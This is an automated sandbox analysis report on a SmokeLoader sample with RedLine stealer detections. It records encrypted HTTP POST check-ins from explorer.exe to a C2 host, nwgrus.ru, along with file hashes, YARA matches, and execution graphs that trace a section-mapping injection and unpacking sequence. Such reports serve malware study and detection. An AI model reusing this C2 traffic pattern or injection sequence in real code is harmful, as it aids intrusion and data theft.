                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:55:55.323379040 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://crbgbhwlxoevenop.net/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 273
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:55:55.323379040 CEST273OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4a 3d c7 f2
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA .[k,vuJ=v@Qkrs4H 3_FujCQ">NQNX]\g++: VF,2G4*-RPxE!]2
                                                                            Oct 14, 2024 01:55:56.957978010 CEST151INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:55:56 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                            Data Ascii: r


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            51192.168.2.45005358.151.148.90802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:56:01.911906958 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://ghpsevkbljqmyuby.org/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 263
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:56:01.911933899 CEST263OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 51 52 ca 93
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA .[k,vuQR{0jq;[{C;eyR~Z}Z+1CV]`FP'bcN$U/Vy_P;\9;7zM|\v?r:o?]}
                                                                            Oct 14, 2024 01:56:03.562711000 CEST151INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:56:03 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 03 00 00 00 72 e8 84
                                                                            Data Ascii: r


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:19:51:58
                                                                            Start date:13/10/2024
                                                                            Path:C:\Users\user\Desktop\1HGXcC63iu.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\1HGXcC63iu.exe"
                                                                            Imagebase:0x400000
                                                                            File size:275'456 bytes
                                                                            MD5 hash:8320DF18FC9660F3A4DCAA29B3707847
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1776886814.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1776886814.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1777031529.0000000002DCD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1776861891.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1777327835.00000000046C1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1777327835.00000000046C1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:1
                                                                            Start time:19:52:07
                                                                            Start date:13/10/2024
                                                                            Path:C:\Windows\explorer.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                            Imagebase:0x7ff72b770000
                                                                            File size:5'141'208 bytes
                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:5
                                                                            Start time:19:52:26
                                                                            Start date:13/10/2024
                                                                            Path:C:\Users\user\AppData\Roaming\scjabht
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Roaming\scjabht
                                                                            Imagebase:0x400000
                                                                            File size:275'456 bytes
                                                                            MD5 hash:8320DF18FC9660F3A4DCAA29B3707847
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2043123976.0000000002D11000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2043123976.0000000002D11000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2042926455.0000000002B70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2043076647.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2043076647.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2043219102.0000000002D9D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 34%, ReversingLabs
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:9.5%
                                                                              Dynamic/Decrypted Code Coverage:28.7%
                                                                              Signature Coverage:41.5%
                                                                              Total number of Nodes:171
                                                                              Total number of Limit Nodes:5
                                                                              execution_graph 3410 402e40 3412 402e37 3410->3412 3413 402edf 3412->3413 3414 4018e6 3412->3414 3415 4018f5 3414->3415 3416 40192e Sleep 3415->3416 3417 401949 3416->3417 3419 40195a 3417->3419 3420 401514 3417->3420 3419->3413 3421 401524 3420->3421 3422 4015c4 NtDuplicateObject 3421->3422 3427 4016e0 3421->3427 3423 4015e1 NtCreateSection 3422->3423 3422->3427 3424 401661 NtCreateSection 3423->3424 3425 401607 NtMapViewOfSection 3423->3425 3426 40168d 3424->3426 3424->3427 3425->3424 3428 40162a NtMapViewOfSection 3425->3428 3426->3427 3429 401697 NtMapViewOfSection 3426->3429 3427->3419 3428->3424 3430 401648 3428->3430 3429->3427 3431 4016be NtMapViewOfSection 3429->3431 3430->3424 3431->3427 3432 4179e0 3435 417620 3432->3435 3434 4179e5 3436 41762d 3435->3436 3437 417820 3436->3437 3438 4176e7 InterlockedExchangeAdd ReadConsoleA FindAtomW GetConsoleFontSize SearchPathW 3436->3438 3439 417830 SetCommState 3437->3439 3443 417849 3437->3443 3440 41774b 7 API calls 3438->3440 3439->3437 3441 417801 3440->3441 3442 4177f8 GetBoundsRect 3440->3442 3444 417811 3441->3444 3445 41780a PulseEvent 3441->3445 3442->3441 3446 417852 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA 3443->3446 3447 417887 3443->3447 3444->3437 3445->3444 3446->3447 3457 417260 LocalAlloc 3447->3457 3451 41791d 3459 417580 3451->3459 3452 4178c4 LoadLibraryA 3458 417290 GetModuleHandleW GetProcAddress VirtualProtect 3452->3458 3454 417922 3455 417959 InterlockedDecrement 3454->3455 3456 41796f 3454->3456 3455->3454 3456->3434 3457->3452 3458->3451 3460 4175a9 QueryDosDeviceA 3459->3460 3461 4175ba 3459->3461 3460->3461 3470 417420 3461->3470 3464 4175d5 3473 417460 3464->3473 3465 4175cd FreeEnvironmentStringsA 3465->3464 3468 417603 3468->3454 3469 4175ec HeapDestroy GetNumaProcessorNode 3469->3468 3471 417431 FatalAppExitA GetModuleHandleW 3470->3471 3472 417443 3470->3472 3471->3472 3472->3464 3472->3465 3474 41746d 3473->3474 3475 417499 3474->3475 3476 417488 BuildCommDCBA 3474->3476 3477 4174a1 WritePrivateProfileStringA FreeEnvironmentStringsA 3475->3477 3480 4174c3 3475->3480 3476->3480 3477->3480 3478 41754a 3478->3468 3478->3469 3480->3478 3481 4174f9 GetNumaAvailableMemoryNode GetComputerNameW SetCalendarInfoA OpenJobObjectA GetShortPathNameW 3480->3481 3482 417450 3480->3482 3481->3480 3485 4173e0 3482->3485 3486 417409 3485->3486 3487 4173fc SetEvent 3485->3487 3486->3480 3487->3486 3541 4178e3 3542 4178f0 LoadLibraryA 3541->3542 3550 417290 GetModuleHandleW GetProcAddress VirtualProtect 3542->3550 3545 41791d 3546 417580 15 API calls 3545->3546 3547 417922 3546->3547 3548 417959 InterlockedDecrement 3547->3548 3549 41796f 3547->3549 3548->3547 3550->3545 3596 401542 3597 40153b 3596->3597 3598 4015c4 NtDuplicateObject 3597->3598 3603 4016e0 3597->3603 3599 4015e1 NtCreateSection 3598->3599 3598->3603 3600 401661 NtCreateSection 3599->3600 3601 401607 NtMapViewOfSection 3599->3601 3602 40168d 3600->3602 3600->3603 3601->3600 3604 40162a NtMapViewOfSection 3601->3604 3602->3603 3605 401697 NtMapViewOfSection 3602->3605 3604->3600 3606 401648 3604->3606 3605->3603 3607 4016be NtMapViewOfSection 3605->3607 3606->3600 3607->3603 3488 2d9003c 3489 2d90049 3488->3489 3501 2d90e0f SetErrorMode SetErrorMode 3489->3501 3494 2d90265 3495 2d902ce VirtualProtect 3494->3495 3497 2d9030b 3495->3497 3496 2d90439 VirtualFree 3500 2d904be LoadLibraryA 3496->3500 3497->3496 3499 2d908c7 3500->3499 3502 2d90223 3501->3502 3503 2d90d90 3502->3503 3504 2d90dad 3503->3504 3505 2d90dbb GetPEB 3504->3505 3506 2d90238 VirtualAlloc 3504->3506 3505->3506 3506->3494 3655 402dd0 3657 402ddc 3655->3657 3656 402edf 3657->3656 3658 4018e6 8 API calls 3657->3658 3658->3656 3551 4018f1 3552 4018f6 3551->3552 3553 40192e Sleep 3552->3553 3554 401949 3553->3554 3555 401514 7 API calls 3554->3555 3556 40195a 3554->3556 3555->3556 3642 401915 3643 40191a 3642->3643 3644 4018c6 3642->3644 3645 40192e Sleep 3643->3645 3646 401949 3645->3646 3647 401514 7 API calls 3646->3647 3648 40195a 3646->3648 3647->3648 3507 402f97 3508 4030ee 3507->3508 3509 402fc1 3507->3509 3509->3508 3510 40307c RtlCreateUserThread NtTerminateProcess 3509->3510 3510->3508 3570 2d90001 3571 2d90005 3570->3571 3576 2d9092b GetPEB 3571->3576 3573 2d90030 3578 2d9003c 3573->3578 3577 2d90972 3576->3577 3577->3573 3579 2d90049 3578->3579 3580 2d90e0f 2 API calls 3579->3580 3581 2d90223 3580->3581 3582 2d90d90 GetPEB 3581->3582 3583 2d90238 VirtualAlloc 3582->3583 3584 2d90265 3583->3584 3585 2d902ce VirtualProtect 3584->3585 3587 2d9030b 3585->3587 3586 2d90439 VirtualFree 3590 2d904be LoadLibraryA 3586->3590 3587->3586 3589 2d908c7 3590->3589 3511 2dcfc27 3514 2dcfc38 3511->3514 3515 2dcfc47 3514->3515 3518 2dd03d8 3515->3518 3520 2dd03f3 3518->3520 3519 2dd03fc CreateToolhelp32Snapshot 3519->3520 3521 2dd0418 Module32First 3519->3521 3520->3519 3520->3521 3522 2dd0427 3521->3522 3524 2dcfc37 3521->3524 3525 2dd0097 3522->3525 3526 2dd00c2 3525->3526 3527 2dd010b 3526->3527 3528 2dd00d3 VirtualAlloc 3526->3528 3527->3527 3528->3527 3632 402d7b 3635 402d38 3632->3635 3633 402dc7 3634 4018e6 8 API calls 3634->3633 3635->3632 3635->3633 3635->3634 3591 2d90005 3592 2d9092b GetPEB 3591->3592 3593 2d90030 3592->3593 3594 2d9003c 7 API calls 3593->3594 3595 2d90038 3594->3595 3557 4014fe 3558 401506 3557->3558 3559 401531 3557->3559 3560 4015c4 NtDuplicateObject 3559->3560 3565 4016e0 3559->3565 3561 4015e1 NtCreateSection 3560->3561 3560->3565 3562 401661 NtCreateSection 3561->3562 3563 401607 NtMapViewOfSection 3561->3563 3564 40168d 3562->3564 3562->3565 3563->3562 3566 40162a NtMapViewOfSection 3563->3566 3564->3565 3567 401697 NtMapViewOfSection 3564->3567 3566->3562 3568 401648 3566->3568 3567->3565 3569 4016be NtMapViewOfSection 3567->3569 3568->3562 3569->3565

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 417620-417648 2 417650-417657 0->2 3 417659-41765b 2->3 4 41765f-417665 2->4 3->4 5 417667-417671 4->5 6 417676-417680 4->6 5->6 7 417682-41768e 6->7 8 417698-41769f 6->8 7->8 8->2 9 4176a1-4176a9 8->9 11 4176b0-4176b6 9->11 12 4176c4-4176cb 11->12 13 4176b8-4176be 11->13 14 4176d1-4176d8 12->14 15 4176cd 12->15 13->12 14->11 16 4176da-4176e1 14->16 15->14 17 417820-41782e 16->17 18 4176e7-4177f6 InterlockedExchangeAdd ReadConsoleA FindAtomW GetConsoleFontSize SearchPathW SetDefaultCommConfigW MoveFileW GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA LCMapStringA 16->18 19 417830-41783e SetCommState 17->19 22 417801-417808 18->22 23 4177f8-4177fb GetBoundsRect 18->23 24 417840-417847 19->24 25 417849-417850 19->25 26 417811-41781d 22->26 27 41780a-41780b PulseEvent 22->27 23->22 24->19 24->25 28 417852-4178b9 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA 25->28 29 4178bf-4178ce call 417260 25->29 26->17 27->26 28->29 34 4178d0-4178e1 29->34 35 41790d-417918 LoadLibraryA call 417290 29->35 38 4178f0-417900 34->38 40 41791d-41792e call 417580 35->40 41 417902 38->41 42 417908-41790b 38->42 46 417930-417937 40->46 41->42 42->35 42->38 48 417943-417949 46->48 49 417939-41793f 46->49 50 417950-417957 48->50 51 41794b call 417280 48->51 49->48 55 417966-41796d 50->55 56 417959-417960 InterlockedDecrement 50->56 51->50 55->46 58 41796f-41797f 55->58 56->55 59 417980-417990 58->59 60 417992 59->60 61 417999-41799c 59->61 60->61 61->59 63 41799e-4179a9 61->63 64 4179b0-4179b5 63->64 66 4179b7-4179bd 64->66 67 4179bf-4179c5 64->67 66->67 68 4179c7-4179d4 66->68 67->64 67->68
                                                                              APIs
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004176F0
                                                                              • ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00417709
                                                                              • FindAtomW.KERNEL32(00000000), ref: 00417710
                                                                              • GetConsoleFontSize.KERNEL32(00000000,00000000), ref: 00417718
                                                                              • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00417730
                                                                              • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00417757
                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 0041775F
                                                                              • GetVersionExW.KERNEL32(?), ref: 0041776C
                                                                              • DisconnectNamedPipe.KERNEL32(?), ref: 0041777F
                                                                              • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 004177C4
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 004177D3
                                                                              • LCMapStringA.KERNEL32(00000000,00000000,004193C8,00000000,?,00000000), ref: 004177E9
                                                                              • GetBoundsRect.GDI32(00000000,00000000,00000000), ref: 004177FB
                                                                              • PulseEvent.KERNEL32(00000000), ref: 0041780B
                                                                              • SetCommState.KERNELBASE(00000000,00000000), ref: 00417834
                                                                              • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00417861
                                                                              • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00417872
                                                                              • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 0041787A
                                                                              • LoadLibraryA.KERNELBASE(004193F8), ref: 00417912
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774733616.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_40b000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID: Console$Comm$FileReadString$AliasesAtomBoundsBuildConfigDefaultDisconnectEventExchangeFindFontInterlockedLengthLibraryLoadModuleMoveNameNamedOutputPathPipePulseRectSearchSizeStateTypeVersion
                                                                              • String ID: k`$}$
                                                                              • API String ID: 2183200751-956986773
                                                                              • Opcode ID: d5ce5a5fcc1c851620d070e0cac741e21c9d104fc792eb926722b7ac6ebd6bb2
                                                                              • Instruction ID: ac660437b8637ef0f9ec563d52a15bda1912d96670292318996d42c4d9e3d472
                                                                              • Opcode Fuzzy Hash: d5ce5a5fcc1c851620d070e0cac741e21c9d104fc792eb926722b7ac6ebd6bb2
                                                                              • Instruction Fuzzy Hash: DF91F371C46528ABC721AB65EC48ADF7B78EF49351F01806EF509A7150CB381A86CFED

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 155 401514-401533 157 401524-40152f 155->157 158 401536-40156e call 401193 155->158 157->158 167 401570 158->167 168 401573-401578 158->168 167->168 170 401898-4018a0 168->170 171 40157e-40158f 168->171 170->168 176 4018a5-4018b7 170->176 174 401595-4015be 171->174 175 401896 171->175 174->175 185 4015c4-4015db NtDuplicateObject 174->185 175->176 182 4018c5 176->182 183 4018bc-4018e3 call 401193 176->183 182->183 185->175 187 4015e1-401605 NtCreateSection 185->187 189 401661-401687 NtCreateSection 187->189 190 401607-401628 NtMapViewOfSection 187->190 189->175 191 40168d-401691 189->191 190->189 193 40162a-401646 NtMapViewOfSection 190->193 191->175 194 401697-4016b8 NtMapViewOfSection 191->194 193->189 196 401648-40165e 193->196 194->175 197 4016be-4016da NtMapViewOfSection 194->197 196->189 197->175 199 4016e0 call 4016e5 197->199
                                                                              APIs
                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                              • String ID:
                                                                              • API String ID: 1546783058-0
                                                                              • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                              • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                              • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                              • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 202 4014fe-401503 203 401531-40156e call 401193 202->203 204 401506-401511 202->204 214 401570 203->214 215 401573-401578 203->215 214->215 217 401898-4018a0 215->217 218 40157e-40158f 215->218 217->215 223 4018a5-4018b7 217->223 221 401595-4015be 218->221 222 401896 218->222 221->222 232 4015c4-4015db NtDuplicateObject 221->232 222->223 229 4018c5 223->229 230 4018bc-4018e3 call 401193 223->230 229->230 232->222 234 4015e1-401605 NtCreateSection 232->234 236 401661-401687 NtCreateSection 234->236 237 401607-401628 NtMapViewOfSection 234->237 236->222 238 40168d-401691 236->238 237->236 240 40162a-401646 NtMapViewOfSection 237->240 238->222 241 401697-4016b8 NtMapViewOfSection 238->241 240->236 243 401648-40165e 240->243 241->222 244 4016be-4016da NtMapViewOfSection 241->244 243->236 244->222 246 4016e0 call 4016e5 244->246
                                                                              APIs
                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID: Section$CreateDuplicateObjectView
                                                                              • String ID:
                                                                              • API String ID: 1652636561-0
                                                                              • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                              • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                              • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                              • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 249 401542-40156e call 401193 258 401570 249->258 259 401573-401578 249->259 258->259 261 401898-4018a0 259->261 262 40157e-40158f 259->262 261->259 267 4018a5-4018b7 261->267 265 401595-4015be 262->265 266 401896 262->266 265->266 276 4015c4-4015db NtDuplicateObject 265->276 266->267 273 4018c5 267->273 274 4018bc-4018e3 call 401193 267->274 273->274 276->266 278 4015e1-401605 NtCreateSection 276->278 280 401661-401687 NtCreateSection 278->280 281 401607-401628 NtMapViewOfSection 278->281 280->266 282 40168d-401691 280->282 281->280 284 40162a-401646 NtMapViewOfSection 281->284 282->266 285 401697-4016b8 NtMapViewOfSection 282->285 284->280 287 401648-40165e 284->287 285->266 288 4016be-4016da NtMapViewOfSection 285->288 287->280 288->266 290 4016e0 call 4016e5 288->290
                                                                              APIs
                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                              • String ID:
                                                                              • API String ID: 1546783058-0
                                                                              • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                              • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                              • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                              • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 293 401549-40156e call 401193 297 401570 293->297 298 401573-401578 293->298 297->298 300 401898-4018a0 298->300 301 40157e-40158f 298->301 300->298 306 4018a5-4018b7 300->306 304 401595-4015be 301->304 305 401896 301->305 304->305 315 4015c4-4015db NtDuplicateObject 304->315 305->306 312 4018c5 306->312 313 4018bc-4018e3 call 401193 306->313 312->313 315->305 317 4015e1-401605 NtCreateSection 315->317 319 401661-401687 NtCreateSection 317->319 320 401607-401628 NtMapViewOfSection 317->320 319->305 321 40168d-401691 319->321 320->319 323 40162a-401646 NtMapViewOfSection 320->323 321->305 324 401697-4016b8 NtMapViewOfSection 321->324 323->319 326 401648-40165e 323->326 324->305 327 4016be-4016da NtMapViewOfSection 324->327 326->319 327->305 329 4016e0 call 4016e5 327->329
                                                                              APIs
                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                              • String ID:
                                                                              • API String ID: 1546783058-0
                                                                              • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                              • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                              • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                              • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
